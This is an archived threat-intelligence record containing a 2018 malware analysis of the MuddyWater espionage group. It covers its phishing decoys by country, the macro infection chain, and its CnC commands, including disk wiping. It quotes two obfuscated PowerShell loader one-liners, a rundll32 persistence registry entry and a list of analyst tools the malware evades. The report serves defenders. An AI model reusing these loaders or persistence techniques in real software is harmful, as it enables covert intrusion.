{
	"id": "10410d11-2c2e-4298-a474-c5c6561ad695",
	"created_at": "2026-04-06T00:19:07.285654Z",
	"updated_at": "2026-04-10T03:34:54.776559Z",
	"deleted_at": null,
	"sha1_hash": "925ce088ef1ff0bd3008fc998c554db7aaff5e4b",
	"title": "MuddyWater expands operations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4540276,
	"plain_text": "MuddyWater expands operations\r\nBy GReAT\r\nPublished: 2018-10-10 · Archived: 2026-04-05 16:25:11 UTC\r\nSummary\r\nMuddyWater is a relatively new APT that surfaced in 2017. It has focused mainly on governmental targets in Iraq and Saudi\r\nArabia, according to past telemetry. However, the group behind MuddyWater has been known to target other countries in the\r\nMiddle East, Europe and the US. We recently noticed a large number of spear-phishing documents that appear to be targeting\r\ngovernment bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in\r\naddition to the continuous targeting of Iraq and Saudi Arabia. Other victims were also detected in Mali, Austria, Russia, Iran\r\nand Bahrain. These new documents have appeared throughout 2018 and escalated from May onwards. The attacks are still\r\nongoing.\r\nThe new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The\r\nattackers rely on a range of compromised hosts to deliver their attacks. 
In the advanced stages of this research, we were able\r\nnot only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the\r\nattackers.\r\nPrevious related research:\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html?m=1\r\nhttps://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/\r\nhttps://www.sekoia.fr/blog/falling-on-muddywater/\r\nDecoy images by country\r\nJordan\r\nThe Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc) DAMAMAX.doc\r\nTurkey\r\nTurkey’s General Directorate of Security Turkey’s Directorate General of Coastal Safety\r\nhttps://securelist.com/muddywater/88059/\r\nPage 1 of 12\n\nTurkey’s General Directorate of Security (Onemli Rapor.doc) Turkey’s Ministry of the Interior (Early election.doc)\r\nSaudi Arabia\r\nDocument signed by the Major General Pilot, commander of the Saudi Royal Air Force\r\nKSA King Saud University (KSU) KSA King Saud University (KSU)\r\nAzerbaijan\r\nİnkişaf üçün görüş.doc (meeting for development)\r\nIraq\r\nIraqi Ministry of Foreign Affairs Government of Iraq, the Treasury of the Council of Ministers\r\nPakistan\r\nECP.doc National Assembly of Pakistan.doc\r\nAfghanistan\r\nPresident.doc, E-government of Afghanistan\r\nTechnical details\r\nBelow is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA\r\ncode via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim\r\nsystem information and then receives commands supported by the malware.\r\nThe initial infection vector\r\nThe initial infection starts with macro-enabled Office 97-2003 Word files whose 
macros are usually password-protected to\r\nhinder static analysis.\r\nMalicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also\r\nexecuted when the user activates a fake text box.\r\nThe macro payload analysis, dropped files and registry keys\r\nThe macro payload, which is Base64 encoded, does the following:\r\n1. Drops two or three files into the “ProgramData” folder. The dropped files are either in the root of the\r\n“ProgramData” folder or in a subdirectory. The file names may vary from one version of the malware to another.\r\n\\EventManager.dll\r\n\\EventManager.logs\r\n\\WindowsDefenderService.ini\r\n2. Adds a registry entry in the current user’s RUN key (HKCU) for later execution when the user next logs in. In some\r\ncases, the macro spawns the malicious payload/process instantly without waiting for the next time the user logs in.\r\nThe registry keys and executables may vary from one version of the malware to another.\r\nName: WindowsDefenderUpdater\r\nType: REG_EXPAND_SZ\r\nData: c:\\windows\\system32\\rundll32.exe advpack.dll,LaunchINFSection C:\\ProgramData\\EventManager.logs,Defender,1,\r\nThe next time the user logs in, the dropped payload will be executed. The executables have been chosen specifically for\r\nbypassing allowlisting solutions since they are all from Microsoft and very likely allowlisted. Regardless of the file\r\nextensions, the files dropped by the macro are EITHER INF, SCT and text files OR VBS and text files.\r\nCase 1: INF, SCT and text files dropped by the macro\r\n1. INF is launched via the advpack.dll “LaunchINFSection” function.\r\n2. INF registers the SCT file (scriptlet file) via scrobj.dll (Microsoft Scriptlet library).\r\n3. 
Via WMI (winmgmt), the JavaScript or VBScript code in the SCT file spawns a PowerShell one-liner which finally\r\nconsumes the text file.\r\npowershell.exe -exec Bypass -c $s=(get-content C:\\\\ProgramData\\\\WindowsDefenderService.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));\r\nPowerShell one-liner\r\nEncoded text file\r\nExecution flow:\r\nCase 2: VBS and text files dropped by the macro\r\nThe VBS file decodes itself and calls mshta.exe, passing on one line of VBScript code to it, which in turn spawns a\r\nPowerShell one-liner which finally consumes the text file (usually Base64-encoded text).\r\npowershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\ZIPSDK\\ProjectConfManagerNT.ini))));\r\nPowerShell one-liner\r\nEncoded text file\r\nExecution flow:\r\nThe PowerShell code\r\nWhen PowerShell is invoked, whether via WMI, wscript.exe or mshta.exe, it executes a one-liner PowerShell code (as\r\noutlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has\r\nmultiple layers of obfuscation.\r\nThe first thing the PowerShell code does is to disable Office “Macro Warnings” and “Protected View”. This is to ensure\r\nfuture attacks don’t require user interaction. It also allows macro code to access internal VBA objects for stealthier macro\r\ncode execution in future attacks.\r\nNext, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully\r\nrebooted. 
The names are linked to various tools used by malware researchers.\r\n\"win32_remote\",\"win64_remote64\",\"ollydbg\",\"ProcessHacker\",\"tcpview\",\"autoruns\",\"autorunsc\",\"filemon\",\"procmon\",\"regmon\",\"procexp\",\"idaq\",\r\nDenylisted process names in the malware\r\nIn some cases, it calculates the checksum of each running process name, and if it matches any hard-coded checksums, it\r\ncauses a BSOD via the ntdll.dll “NtRaiseHardError” function.\r\nCnC communication\r\nA URL is selected at random from a long list of embedded URLs held in an array named $dragon_middle. The selected\r\nURL is subsequently used for communication with the CnC server. If it can’t send data to the chosen CnC URL, it tries to\r\nobtain another random URL from $dragon_middle, then sleeps from one to 30 seconds and loops again.\r\nVictim system reconnaissance\r\nThe code then tries to obtain the victim’s public IP via “https://api.ipify.org/”.\r\nThe public IP is then POSTed, along with the OS version, internal IP, machine name, domain name and username, in encrypted\r\nform to the previously chosen URL to register a new victim. This allows the attackers to accept or reject victims\r\ndepending on their IPs, countries, geolocations, target enterprises, etc. Depending on the response from the attacker’s CnC,\r\nthe victim is assigned an ID, $sysid. This ID is sent to the CnC with each request for commands to execute.\r\nSupported commands\r\n“upload”, “screenshot”, “Excel”, “Outlook”, “risk”, “reboot”, “shutdown”, “clean”. These commands vary from one\r\nversion to another.\r\n1. The “screenshot” command takes a screenshot that is saved as a .PNG file in “ProgramData”.\r\n2. The “Excel” command receives another stage of the PowerShell code, saves it in “c:\\programdata\\a.ps1” and then\r\nasks Excel to execute this PowerShell script via DDE.\r\n3. 
The “Outlook” command receives another stage of the PowerShell code, saves it in “c:\\programdata\\a.ps1” and\r\nthen asks Outlook, via COM and MSHTA.exe, to execute it.\r\n4. The “risk” command receives another stage of the PowerShell code, saves it in “c:\\programdata\\a.ps1” and then\r\nasks Explorer.exe via COM interaction to execute it.\r\n5. The “upload” command downloads files from the CnC and saves them locally in “C:\\ProgramData”.\r\n6. The “clean” command destroys the victim’s disk drives C, D, E, F and then reboots.\r\n7. The “reboot” and “shutdown” commands immediately reboot and shut down the victim’s machine.\r\nIn one version of the malware, the code checks if the “ProgramData” folder has folders or files with the keywords\r\n“Kasper”, “Panda”, or “ESET”.\r\nVictimology\r\nMost victims of MuddyWater were found in Jordan, Turkey, Iraq, Pakistan, Saudi Arabia, Afghanistan and Azerbaijan. Other\r\nvictims were also recorded in Russia, Iran, Bahrain, Austria and Mali. The malicious decoy documents used in the attacks\r\nsuggest they are geopolitically motivated, targeting sensitive personnel and organizations.\r\nAttacker deception and attribution\r\nThe deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most\r\nlikely served as prototypes. Multiple documents used in the attacks also contain embedded paths from their authors’\r\nmachines. These paths are embedded by Office under various circumstances, for instance, when somebody adds a binary\r\nobject (an OLE control, e.g. text box or command button) into a Word document. 
The paths discovered are:\r\n• C:\\Users\\leo\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd\r\n• C:\\Users\\poopak\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd\r\n• C:\\Users\\Vendetta\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd\r\n• C:\\Users\\Turk\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd\r\nLeo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are\r\nbased. Turk could point to a person of Turkish origin. Poopak is a Persian girl’s name or might suggest the authors are not\r\nentirely happy with “Pak”, which could be short for Pakistan. Leo could be one of the attacker’s names. We also don’t rule\r\nout the possibility of false flags, with the attackers using random usernames to confuse researchers.\r\nIn multiple instances, we have also found Chinese text inside the samples, possibly indicating the reuse of code by the\r\nattackers.\r\n无法连接到网址，请等待龙…\r\n无法访问本地计算机寄存器\r\n任务计划程序访问被拒绝\r\nChinese text found in PowerShell code in multiple samples\r\nUnable to connect to the URL, please wait for the dragon…\r\nUnable to access local computer register\r\nTask Scheduler access denied\r\nTranslation of Chinese text\r\nWe have also noticed that for some samples, e.g. 
5a42a712e3b3cfa1db32d9e3d832f8f1, the PowerShell code had only three\r\nCnC URLs, which leads us to believe that most of the CnC URLs in $dragon_middle found in other samples could actually\r\nbe ‘noise’ to distract researchers or trigger false positives.\r\nhttp://www.cankayasrc[.]com/style/js/main.php\r\nhttp://ektamservis[.]com/includes/main.php\r\nhttp://gtme[.]ae/font-awesome/css/main.php\r\nRecommendations for organizations\r\nEffective protection from targeted attacks focuses on advanced detective, preventive and investigative capabilities via\r\nsolutions and training, allowing an organization to control any activities on their network or suspicious files on user systems.\r\nThe best way to prevent attackers from finding and leveraging security holes is to eliminate the holes altogether, including\r\nthose related to improper system configurations or errors in proprietary applications. Organizations are also recommended to\r\nimplement the following steps for an enhanced level of protection at their premises.\r\n1. Use PowerShell Constrained Language Mode, since the malware relies on IEX, Add-Type and New-Object.\r\n2. Lock the PowerShell execution policy to “AllSigned” via GPO.\r\n3. Use an allowlisting solution to prevent certain parent-child process execution hierarchies.\r\nConclusion\r\nThe MuddyWater group has carried out a large number of attacks and demonstrated advanced social engineering, in\r\naddition to the active development of attacks, infrastructure and the use of new methods and techniques. The attackers are\r\nactively improving their toolkit in an effort to minimize their exposure to security products and services. 
Kaspersky Lab\r\nexpects these types of attacks to intensify in the near future.\r\nIn order to protect your company from malware, Kaspersky Lab researchers recommend implementing the following\r\nmeasures:\r\nEducate general staff to be able to distinguish malicious behavior like phishing links.\r\nEducate information security staff to have full configuration, investigative and hunting abilities.\r\nUse a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting\r\nattacks by analyzing network anomalies.\r\nProvide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for\r\ntargeted attack prevention and discovery, such as indicators of compromise and YARA rules.\r\nMake sure enterprise-grade patch management processes are well established and executed.\r\nHigh-profile organizations should have elevated levels of cybersecurity: attacks against them are inevitable and are unlikely\r\nto ever cease.\r\nAdditional information\r\nIn the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’\r\narsenal but also some OPSEC mistakes made by the attackers.\r\nFurther details about the attackers’ arsenal, additional indicators of compromise, YARA rules and attribution information are\r\navailable to customers of Kaspersky Intelligence Reporting. 
Contact: intelreports@kaspersky.com\r\nIndicators of compromise\r\nMD5\r\nFile names\r\nDomains, URLs and IP addresses\r\nSource: https://securelist.com/muddywater/88059/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://securelist.com/muddywater/88059/"
	],
	"report_names": [
		"88059"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3a0cfbbc-2acf-4cc8-afe1-1859679c522c",
			"created_at": "2022-10-25T16:07:24.373716Z",
			"updated_at": "2026-04-10T02:00:04.963615Z",
			"deleted_at": null,
			"main_name": "Vendetta",
			"aliases": [
				"TA2719"
			],
			"source_name": "ETDA:Vendetta",
			"tools": [
				"AsyncRAT",
				"Atros2.CKPN",
				"Nancrat",
				"NanoCore",
				"NanoCore RAT",
				"ReZer0",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"RoboSki",
				"Socmer",
				"Zurten"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434747,
	"ts_updated_at": 1775792094,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/925ce088ef1ff0bd3008fc998c554db7aaff5e4b.pdf",
		"text": "https://archive.orkl.eu/925ce088ef1ff0bd3008fc998c554db7aaff5e4b.txt",
		"img": "https://archive.orkl.eu/925ce088ef1ff0bd3008fc998c554db7aaff5e4b.jpg"
	}
}